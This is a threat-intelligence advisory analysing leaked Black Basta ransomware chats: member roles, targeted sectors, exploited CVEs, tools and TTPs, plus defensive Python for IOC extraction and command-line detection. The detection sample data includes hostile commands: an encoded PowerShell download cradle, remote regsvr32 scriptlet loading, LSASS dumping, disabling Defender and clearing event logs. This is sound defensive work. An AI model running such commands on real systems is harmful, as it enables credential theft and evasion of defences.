Black Basta Ransomware Group’s Leaked Internal Chat Analysis

PT FPT Metrodata Indonesia (FMI) is a joint venture between FPT IS and Metrodata Electronics, focusing on providing Cybersecurity-as-a-Service—including SOC, managed security, professional services, consulting, and threat intelligence—to support Indonesia’s rapidly growing digital economy. FMI is expanding into AI and cloud GPU services to deliver innovative protection and solutions for enterprises. Learn more at https://fmisec.com.
Summary
On February 20, a Telegram user operating under the handle "ExploitWhispers" released what they claim to be an archive of internal Matrix chat logs belonging to the Black Basta ransomware group. The logs, written in Russian, reportedly detail internal communications and operational tactics.
The leak appears to have been motivated by the group's alleged targeting of Russian banks, which provoked retaliation from another threat actor. The released .json file, roughly 50 MB in size, contains messages exchanged in Black Basta's internal chat rooms between September 18, 2023, and September 28, 2024. The archive holds a wide range of sensitive material: phishing templates and target email lists, cryptocurrency wallet addresses, data drop locations, compromised victim credentials, and confirmation of previously reported tactics and techniques.

This advisory serves as the first phase of an ongoing analysis, incorporating findings from both direct examination of the leaked files and OSINT investigations. Further updates will follow as more intelligence is gathered.
Observation and Analysis
Members of the chat
Analysis of the chat activity revealed 49 unique users in the leaked logs. Many of them show minimal activity, but further correlation suggests that several are prominent operators with key roles in the group. The remaining member usernames are listed in the Appendix at the end of this document. Some of these individuals may have ties to former Conti members, pointing to a possible connection between Black Basta and the now-defunct Conti syndicate.
@usernamegg (Primary Operator)
• Coordinates ransomware deployments.
• Manages botnets, credentials, and infrastructure.
• Oversees financial transactions related to ransom payments.
• Provides access details of compromised networks.
@usernamegway (Technical Operator)
• Sets up accounts and credentials for initial access.
• Manages technical deployments (tools like Cobalt Strike, PikaBot).
• Purchases exploits & attack infrastructure on underground markets.
@lapa (Infrastructure & Exploits)
• Manages proxies and SOCKS botnets for C2 communication.
• Handles compromised IP addresses used for pivoting inside networks.
• Sets up Remote Monitoring and Management (RMM) software (such as AnyDesk and Splashtop).
@cameron777 (Target Selection & Access Brokering)
• Identifies high-value targets for ransomware deployment.
• Sells access or brokers VPN/Citrix credentials.
• Scans for vulnerabilities such as CVE-2024-21413, Log4Shell, etc.
@nickolas (Monetization & Data Sales)
• Handles exfiltrated credentials and sensitive data.
• Sells access logs & credential dumps.
• Facilitates wallet addresses & payment processing.
@colin (Unknown Role)
• Engages in ransom negotiations with victims.
• Manages payment details and cryptocurrency wallets.
Affiliates (Various personas)
• Conduct initial access & lateral movement.
• Execute malware payloads (Formbook, Amadey, etc.).
• Use tools like PsExec, Rclone, and Meterpreter for lateral movement, exfiltration, and post-exploitation access.
Victimology
We extracted the names of 371 companies from links to company-profile sites such as Apollo and ZoomInfo that Black Basta members shared in the chats. The group had either targeted or planned to target these companies; we are still analyzing the data to determine which of them were actually compromised or attacked.

Reconnaissance on Companies: Black Basta maintains a shared spreadsheet of companies it is trying to target, and members collaborate on it. Entries include the names of persons of interest for social engineering attacks and other strategy notes; the group often identifies multiple targets at a single company.
Victim Prioritization & Motive: Black Basta prioritizes financial viability when selecting targets, focusing on high-revenue companies rather than mass-targeting lower-value entities. Internal discussions make the reasoning explicit: a few high-profile victims generate more revenue than widespread attacks on smaller organizations. The group emphasizes companies more likely to pay, particularly those handling sensitive or critical data, to maximize profit.
The group frequently focuses on legal services, financial services, healthcare, and manufacturing sectors, as they handle sensitive information and are more likely to pay to protect client confidentiality.

While Black Basta claims to be apolitical, internal discussions suggest geopolitical and regulatory factors may influence their choice of targets. In some cases, the group leverages stolen data for secondary extortion, selling valuable intellectual property or business secrets to competitors or foreign entities. This highlights their interest in maximizing financial gains not just through ransom payments, but also by monetizing stolen data through external channels.
Vulnerabilities
The Black Basta chat logs reference 62 unique CVEs, over 85% of which were either listed in the CISA Known Exploited Vulnerabilities (KEV) catalog or reported as actively exploited. This indicates a clear preference for known weaknesses with exploits already available. The group focuses on widely adopted enterprise technologies, including Citrix NetScaler, Atlassian Confluence, Fortinet, Cisco, Palo Alto Networks, Check Point, and Microsoft Windows, suggesting a strategy of maximizing impact by exploiting widely deployed systems.
| Product | CVEs identified in the chat logs as exploited by Black Basta |
|---|---|
| Atlassian Confluence | CVE-2021-44228, CVE-2024-21683, CVE-2023-22515, CVE-2022-26134 |
| Bricks Builder WordPress Theme | CVE-2024-25600 |
| Check Point | CVE-2024-24919 |
| Cisco IOS XE | CVE-2023-20198 |
| Citrix NetScaler | CVE-2023-3519, CVE-2023-3467, CVE-2023-3466, CVE-2023-4966 |
| ConnectWise ScreenConnect | CVE-2024-1709, CVE-2024-1708 |
| Linux kernel | CVE-2024-1086 |
| Microsoft Exchange | CVE-2021-26855, CVE-2021-28482, CVE-2021-42321, CVE-2022-41040, CVE-2022-41082, CVE-2023-36745 |
| Microsoft Office | CVE-2023-23397, CVE-2023-21716, CVE-2017-11882 |
| Microsoft Outlook | CVE-2024-21378, CVE-2024-21413 |
| Microsoft SharePoint | CVE-2023-29357 |
| Microsoft Windows | CVE-2020-1472, CVE-2021-40444, CVE-2021-42287, CVE-2021-42278, CVE-2022-30190, CVE-2022-37969, CVE-2023-36874, CVE-2023-36884, CVE-2024-21338, CVE-2024-26169, CVE-2023-36394, CVE-2023-35628 |
| Palo Alto Networks PAN-OS | CVE-2024-3400 |
| RARLAB WinRAR | CVE-2023-38831 |
| Spring Framework (VMware) | CVE-2022-22965 |
| WordPress SMTP Plugins | CVE-2023-6875, CVE-2023-7027 |
| Zimbra | CVE-2022-27925, CVE-2022-37042, CVE-2022-41352 |
| Zyxel | CVE-2022-30525 |
| Exim | CVE-2023-42115 |
| F5 BIG-IP | CVE-2022-1388 |
| Fortinet | CVE-2024-23109, CVE-2024-23108, CVE-2024-21762, CVE-2024-23113 |
| GitLab | CVE-2023-7028 |
| Google Chrome | CVE-2022-0609 |
| Intel | CVE-2017-5754, CVE-2017-5753 |
| Jenkins | CVE-2024-23897 |
| JetBrains TeamCity | CVE-2024-27198, CVE-2023-42793 |
| Juniper Junos OS | CVE-2023-36845, CVE-2023-36844 |
The chat logs show that within days of new security advisories being issued, Black Basta members were actively discussing the vulnerabilities affecting several widely used products.

Black Basta's target selection is heavily vulnerability-driven, with members discussing specific exploits for initial access, particularly against email services. Reconnaissance includes scanning for domain and infrastructure weaknesses so that known vulnerabilities can be exploited efficiently. Accessibility also plays a crucial role: the attackers leverage exposed RDP, Citrix, VPN, or email credentials, often obtained through brute-force attacks or credential stuffing.
The exploitation strategy is opportunistic: rather than investing heavily in custom malware or zero-days, the group favors existing vulnerabilities with publicly available proof-of-concept (PoC) exploits to gain footholds in targeted networks.
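The following is an added example (not code from the original advisory or from FMI) that turns the product table above into something checkable: it normalizes the CVE identifiers (including the malformed ones the extraction produced, such as "CVE2022-41082" or an en dash in place of a hyphen), maps them per product, and measures KEV coverage against a parsed copy of the CISA catalog. The table rows and the KEV subset embedded here are constructed samples; in practice, load the real feed from https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json with json.load and pass it to kev_ids().

```python
import re
from collections import defaultdict

# Four rows copied from the product table above (a constructed subset; the two
# malformed IDs are left exactly as the extraction produced them).
SAMPLE_TABLE = """\
| Citrix NetScaler | CVE-2023-3519, CVE-2023-3467, CVE-2023-3466, CVE-2023-4966 |
| Microsoft Exchange | CVE-2021-26855, CVE-2021-28482, CVE-2021-42321, CVE-2022-41040, CVE2022-41082, CVE-2023-36745 |
| Microsoft Windows | CVE-2020-1472, CVE-2021-40444, CVE2022-30190, CVE-2023-36884 |
| Palo Alto Networks Pan-OS | CVE-2024-3400 |
"""

# Constructed stand-in for the CISA KEV feed; only the document shape
# ({"vulnerabilities": [{"cveID": ...}, ...]}) mirrors the real JSON.
SAMPLE_KEV = {"vulnerabilities": [{"cveID": c} for c in (
    "CVE-2023-3519", "CVE-2023-4966", "CVE-2021-26855", "CVE-2022-41040",
    "CVE-2022-41082", "CVE-2020-1472", "CVE-2021-40444", "CVE-2022-30190",
    "CVE-2023-36884", "CVE-2024-3400",
)]}

# Accepts "CVE-2022-41082", "CVE2022-41082" and dash variants such as U+2013.
CVE_RE = re.compile(r"CVE[-\u2013\u2014]?(\d{4})[-\u2013\u2014]?(\d{4,7})", re.I)


def normalize_cve(token):
    """Return the canonical CVE-YYYY-NNNN form, or raise on junk."""
    m = CVE_RE.fullmatch(token.strip())
    if m is None:
        raise ValueError(f"not a CVE identifier: {token!r}")
    return f"CVE-{m.group(1)}-{m.group(2)}"


def parse_product_table(text):
    """Map product -> sorted unique CVE list from '| product | cve, cve |' rows."""
    table = {}
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 2 or not CVE_RE.match(cells[1]):
            continue  # header, separator or empty rows
        product, ids = cells
        table[product] = sorted({normalize_cve(t) for t in ids.split(",") if t.strip()})
    return table


def kev_ids(catalog):
    """Set of CVE IDs present in a parsed KEV catalog document."""
    return {entry["cveID"] for entry in catalog["vulnerabilities"]}


def kev_coverage(table, known_exploited):
    """Return (in_kev, not_in_kev, ratio) over the unique CVEs of the table."""
    all_cves = {cve for cves in table.values() for cve in cves}
    in_kev = sorted(all_cves & known_exploited)
    not_in_kev = sorted(all_cves - known_exploited)
    ratio = len(in_kev) / len(all_cves) if all_cves else 0.0
    return in_kev, not_in_kev, ratio


def products_by_exposure(table, known_exploited):
    """Products ranked by how many of their listed CVEs sit in KEV, i.e. which
    patch queues to audit first."""
    counts = defaultdict(int)
    for product, cves in table.items():
        counts[product] = sum(1 for c in cves if c in known_exploited)
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    table = parse_product_table(SAMPLE_TABLE)
    kev = kev_ids(SAMPLE_KEV)
    in_kev, missing, ratio = kev_coverage(table, kev)
    print(f"{len(in_kev)} of {len(in_kev) + len(missing)} CVEs in KEV ({ratio:.0%})")
    print("not in KEV:", ", ".join(missing))
    for product, n in products_by_exposure(table, kev):
        print(f"  {product}: {n}/{len(table[product])} in KEV")
```

The CVEs that fall outside KEV are the ones worth a second look: either the group is discussing exploitation ahead of public confirmation, or the ID was mis-transcribed in the chat, and both cases deserve a manual check against the vendor advisory before the list feeds a patch-priority decision.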
Tools
From the chats we extracted 511 unique .exe file names, most of them either generated by the threat actors (TAs) or downloaded from various repositories. We also identified 131 unique malware samples along with their associated hashes. On the financial side, we found 137 unique BTC wallet addresses, though not all can be attributed directly to the TAs, since some belong to services the group paid for.
The group makes extensive use of public tools from GitHub, integrating DirtyCLR, ElusiveMice, TeamsPhisher, and others for exploitation and persistence. Their malware arsenal consists of well-known infostealers and loaders, including Lumma, Formbook, Amadey, AgentTesla, PikaBot, and SmokeLoader, deployed according to the specific operation.

Their modular C2 and data-transfer infrastructure is built around Cobalt Strike, Rclone, and inara.pk, with fallback channels over netcat and SSH, giving them operational resilience even when parts of the infrastructure are taken down.
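As an added example (not code from the original advisory or from FMI), the extraction described in this section can be reproduced with a handful of regular expressions over the chat export. The record layout (timestamp, sender, text fields) is an assumption about the archive, and every message, hash and wallet address below is constructed for illustration. The wallet filter is the part worth noting: a hex hash that happens to start with 1 or 3 also satisfies the base58 pattern, so hex-only candidates are discarded before they are counted as wallets.

```python
import json
import re
from collections import defaultdict

# Constructed sample of a chat export. The record shape (timestamp, sender, text)
# is an assumption about the archive; adapt the field names to the real file.
# Every hash and wallet address below is a made-up placeholder, not a real IOC.
SAMPLE_EXPORT = json.dumps([
    {"timestamp": "2024-03-01T10:02:11Z", "sender": "lapa",
     "text": "new build loader.exe sha256 " + "a" * 64},
    {"timestamp": "2024-03-01T10:05:40Z", "sender": "gg",
     "text": "pay the proxy seller here 1Examp1eFakeAddr9Tz8aQxJ7kRbhW2mNq"},
    {"timestamp": "2024-03-01T10:07:03Z", "sender": "gg",
     "text": "md5 of the beacon " + "3f" * 16 + " still clean on av"},
    {"timestamp": "2024-03-02T08:11:19Z", "sender": "lapa",
     "text": "wallet for the vps bc1qfakeaddressexample0000000000zzzzzzzzzz"},
    {"timestamp": "2024-03-02T09:30:00Z", "sender": "cameron777",
     "text": "ran psexec.exe then Rclone.exe on the file server"},
    {"timestamp": "2024-03-02T09:31:12Z", "sender": "nickolas",
     "text": "sha1 " + "b" * 40 + " for the dump tool"},
])

PATTERNS = {
    "sha256": re.compile(r"\b[a-fA-F0-9]{64}\b"),
    "sha1": re.compile(r"\b[a-fA-F0-9]{40}\b"),
    "md5": re.compile(r"\b[a-fA-F0-9]{32}\b"),
    # P2PKH/P2SH (base58: no 0, O, I, l) and bech32 segwit addresses
    "btc_legacy": re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b"),
    "btc_bech32": re.compile(r"\bbc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{38,58}\b"),
    "exe": re.compile(r"\b[\w.-]+\.exe\b", re.I),
}
HEX_ONLY = re.compile(r"[a-fA-F0-9]+")


def extract_iocs(records):
    """Return {category: {indicator: [senders]}} over all messages; hashes and
    file names are lower-cased so one artefact is not counted twice."""
    found = defaultdict(lambda: defaultdict(set))
    for rec in records:
        text, sender = rec["text"], rec["sender"]
        for cat in ("sha256", "sha1", "md5"):
            for hit in PATTERNS[cat].findall(text):
                found[cat][hit.lower()].add(sender)
        for cat in ("btc_legacy", "btc_bech32"):
            for hit in PATTERNS[cat].findall(text):
                if HEX_ONLY.fullmatch(hit):
                    continue  # hex hash starting with 1 or 3, not a wallet
                found[cat][hit].add(sender)
        for hit in PATTERNS["exe"].findall(text):
            found["exe"][hit.lower()].add(sender)
    return {cat: {ioc: sorted(s) for ioc, s in iocs.items()} for cat, iocs in found.items()}


def ioc_counts(records):
    """Unique indicator count per category (the kind of figure quoted above)."""
    return {cat: len(iocs) for cat, iocs in extract_iocs(records).items()}


if __name__ == "__main__":
    records = json.loads(SAMPLE_EXPORT)
    for cat, iocs in extract_iocs(records).items():
        print(cat)
        for ioc, senders in iocs.items():
            print(f"  {ioc}  <- {', '.join(senders)}")
    print(ioc_counts(records))
```

Keeping the sender list per indicator is what lets hashes and wallets be tied back to the personas described earlier; the address-to-service attribution problem mentioned above (wallets that belong to vendors the group paid, not to the group) still needs a manual pass, since nothing in the text distinguishes the two.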
TTPs observed
Reconnaissance
Black Basta places significant emphasis on reconnaissance, using ZoomEye, Censys, Shodan, and Fofa to find internet-exposed endpoints. This phase is critical to identifying vulnerable systems before an attack is launched. Internal discussions show that certain members, particularly "lapa" and "gg", are highly active with these tools and frequently share scan results and analysis with the group. Their reliance on automated reconnaissance platforms suggests a deliberate approach to gathering pre-attack intelligence so that the most accessible, high-value targets are exploited first.

Initial Access
Black Basta frequently gains initial access by exploiting public-facing applications. They have actively targeted vulnerabilities in Zimbra, OWA, Cisco, Fortinet, and CheckPoint systems, leveraging known exploits such as Log4Shell to infiltrate networks. Their preference for readily available exploits aligns with their opportunistic approach to compromising exposed infrastructure.

In addition to exploiting software vulnerabilities, the group relies on valid accounts to escalate privileges and move laterally within a network. They obtain credentials by dumping LSASS on compromised machines, then reuse those credentials for lateral movement over PsExec and RDP, moving through the environment quietly while maintaining persistence.
Execution
Black Basta relies on multiple execution techniques to deploy their payloads while maintaining stealth and evading detection. The group makes heavy use of PowerShell, CMD, and Windows Management Instrumentation Command-line (WMIC) as part of their command and scripting interpreter tactics. They often encode commands in Base64 to obscure their execution and evade signature-based detection. These tools allow them to perform system discovery, privilege escalation, and payload execution efficiently.

They also leverage Windows Management Instrumentation to run reconnaissance commands and execute malicious payloads, frequently combined with PowerShell and Living-off-the-Land Binaries (LOLBins) to blend in with legitimate system activity. To further avoid detection, Black Basta employs signed binary proxy execution by abusing trusted Windows executables such as rundll32, msiexec, and regsvr32. These binaries let them execute malicious code stealthily, bypass security controls, and maintain persistence on compromised systems.

Discovery
Black Basta engages in system information discovery by utilizing tools such as systeminfo, WMIC, and PowerShell to collect details about system configurations, domain information, and installed security solutions. The group also conducts account discovery, using PowerShell and LDAP queries to enumerate users, groups, and computer assets within Active Directory. Additionally, they perform network scanning, actively probing for open RDP, SMB, and VPN ports to identify lateral movement opportunities.
Persistence
To maintain access within compromised environments, Black Basta leverages registry run keys, adding payloads and beacons to registry keys to ensure persistence across system reboots. They also create scheduled tasks, configuring them to execute payloads at specific times or during system startup to maintain their foothold.

Command and Control (C2)
For communication with their infrastructure, the group establishes TCP connections using PowerShell and .NET-based socket clients to interact with command-and-control (C2) servers. They also perform ingress tool transfers, downloading tools such as DirtyCLR, PoolPartyBof, and Rclone from repositories like GitHub using PowerShell and curl.

Credential Access
Black Basta focuses on stealing credentials through OS credential dumping, extracting sensitive login data by dumping process memory with Procdump and accessing credential storage in registry hives. Additionally, they use brute-force techniques, launching password spraying attacks against OWA and VPN portals, leveraging credential lists obtained during initial access.

Privilege Escalation
The group exploits known vulnerabilities such as CVE-2024-3400 (Palo Alto PAN-OS) and CVE-2023-36745 (Microsoft Exchange) to obtain elevated access, typically root or SYSTEM on the affected appliance or server, within targeted environments. They also create or modify system processes, using tools like PsExec and runspawn to execute tasks with elevated privileges.

Lateral Movement
Black Basta moves laterally within compromised networks using remote services, specifically leveraging SMB and Windows Admin Shares through PsExec. They also gain access to systems via Remote Desktop Protocol (RDP) by either stealing credentials or creating new administrator accounts through registry modifications.
Defense Evasion
To avoid detection, the group engages in impairing security defenses, actively disabling Windows Defender, firewalls, and endpoint security solutions such as Cortex, Sophos, and CrowdStrike using registry modifications and PowerShell commands. They also employ obfuscation techniques, encoding payloads in Base64 to evade antivirus detection by decoding them at runtime. Furthermore, they practice indicator removal on hosts, clearing Windows Event Logs using wevtutil and deleting traces of their activities post-execution to minimize forensic evidence.
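The following added example (not code from the original advisory, from FMI, or from the group) turns the Execution, Discovery, Persistence, Command and Control, Credential Access, and Defense Evasion behaviours described above into command-line triage rules, decodes -EncodedCommand payloads before matching, and groups hits per host. The event records and their paths are constructed; the (host, cmdline) fields are an assumed reduction of Sysmon Event ID 1 / Security 4688 data, and the MITRE ATT&CK technique IDs are our own mapping of the page's descriptions.

```python
import base64
import re

# Constructed process-creation records. The (host, cmdline) shape is an assumed
# reduction of Sysmon Event ID 1 / Security 4688 fields; hosts and paths are made up.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
    .encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"host": "ws01", "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"host": "ws01", "cmdline": r"regsvr32.exe /s /n /u /i:http://example.invalid/x.sct scrobj.dll"},
    {"host": "srv02", "cmdline": r"procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\l.dmp"},
    {"host": "srv02", "cmdline": 'powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"host": "srv02", "cmdline": "wevtutil.exe cl Security"},
    {"host": "dc01", "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v upd /t REG_SZ /d C:\Users\Public\b.exe"},
    {"host": "dc01", "cmdline": r"schtasks /create /sc onstart /tn Updater /tr C:\Users\Public\b.exe /ru SYSTEM"},
    {"host": "dc01", "cmdline": r"curl -L -o C:\Users\Public\rclone.zip https://github.com/rclone/rclone/releases/latest"},
    {"host": "fs01", "cmdline": r"psexec64.exe \\fs01 -s cmd.exe"},
    {"host": "ws03", "cmdline": r"notepad.exe C:\Users\alice\notes.txt"},  # benign control
]

# (ATT&CK technique, short name, pattern); applied to raw and decoded command lines.
RULES = [(t, n, re.compile(p, re.I)) for t, n, p in [
    ("T1059.001", "encoded PowerShell", r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    ("T1218.010", "regsvr32 scriptlet/remote COM", r"\bregsvr32(?:\.exe)?\b.*(?:/i:https?://|scrobj\.dll)"),
    ("T1218.011", "rundll32 from script or user-writable path", r"\brundll32(?:\.exe)?\b.*(?:javascript:|\\users\\|\\temp\\|\\programdata\\)"),
    ("T1218.007", "msiexec remote package", r"\bmsiexec(?:\.exe)?\b.*\s/[iq]\S*\s+https?://"),
    ("T1105", "ingress tool transfer", r"(?:\bcurl\b|\bwget\b|Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|certutil\S*\s+-urlcache).*https?://"),
    ("T1003.001", "LSASS memory dump", r"(?:procdump\S*.*\blsass\b|comsvcs\.dll.*MiniDump)"),
    ("T1562.001", "security tooling disabled", r"(?:Set-MpPreference.*-Disable\w+|\bsc(?:\.exe)?\s+(?:stop|config)\s+(?:WinDefend|Sense)\b|DisableAntiSpyware)"),
    ("T1070.001", "event log cleared", r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\b"),
    ("T1547.001", "Run key persistence", r"\breg(?:\.exe)?\s+add\b.*\\CurrentVersion\\Run"),
    ("T1053.005", "scheduled task created", r"\bschtasks(?:\.exe)?\s+/create\b"),
    ("T1021.002", "PsExec lateral movement", r"\bpsexec(?:64)?(?:\.exe)?\b"),
    ("T1082", "host/domain discovery", r"\b(?:systeminfo|wmic\s+computersystem|nltest\s+/dclist)\b"),
]]
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_powershell(cmdline):
    """Return the UTF-16LE payload of an -EncodedCommand argument, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not really base64 / not a PowerShell payload


def triage(event):
    """Sorted (technique, name) hits for one event; the decoded -enc payload is
    matched as well, so a download cradle hidden in Base64 is still flagged."""
    texts = [event["cmdline"]]
    decoded = decode_encoded_powershell(event["cmdline"])
    if decoded:
        texts.append(decoded)
    return sorted({(t, n) for t, n, rx in RULES if any(rx.search(x) for x in texts)})


def triage_all(events):
    """Group hits per host so an analyst sees which kill-chain stages each box reached."""
    report = {}
    for ev in events:
        hits = triage(ev)
        if hits:
            report.setdefault(ev["host"], []).extend(hits)
    return report


if __name__ == "__main__":
    for host, hits in triage_all(SAMPLE_EVENTS).items():
        print(host)
        for technique, name in sorted(set(hits)):
            print(f"  {technique:<10} {name}")
```

The rundll32 and PsExec rules will fire on legitimate administration in many environments, so treat them as context for the higher-confidence hits (LSASS dump, Defender disabled, log clearing, Run-key persistence) on the same host rather than as stand-alone alerts, and tune the path list to local baselines.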

Assessment of the Actor & Information
Based on the recent activities of the group, we assess the reliability of the Black Basta threat group as B – Usually reliable.
Based on our overall analysis of the samples posted by the TA, we assess the credibility of the threat actor’s claims as 2 – Probably true.
Appendix
Other Black Basta member usernames identified in the chat logs:
| Username | Username |
|---|---|
| nn | sunortla |
| ss | adm |
| yy | iamnurnazarov |
| gg | manager361 |
| boy | manager880 |
| hunter | arslanshabbirmalik |
| zz | colin |
| mecor | nickolas |
| 777 | princehorn |
| cc | lincoln |
| ugway | ugw |
| tt | mel |
| mm | nn1 |
| ww | ng |
| w | ssd |
| lapa | temp |
| xx | cameron777 |
| vv | dd |
| ff | cob_crypt_ward |
| jj | tinker |
| hh | n3auxaxl |
| muaddib6 | blood |
| burito | staffer |
| timber | chuck |
| u123 | |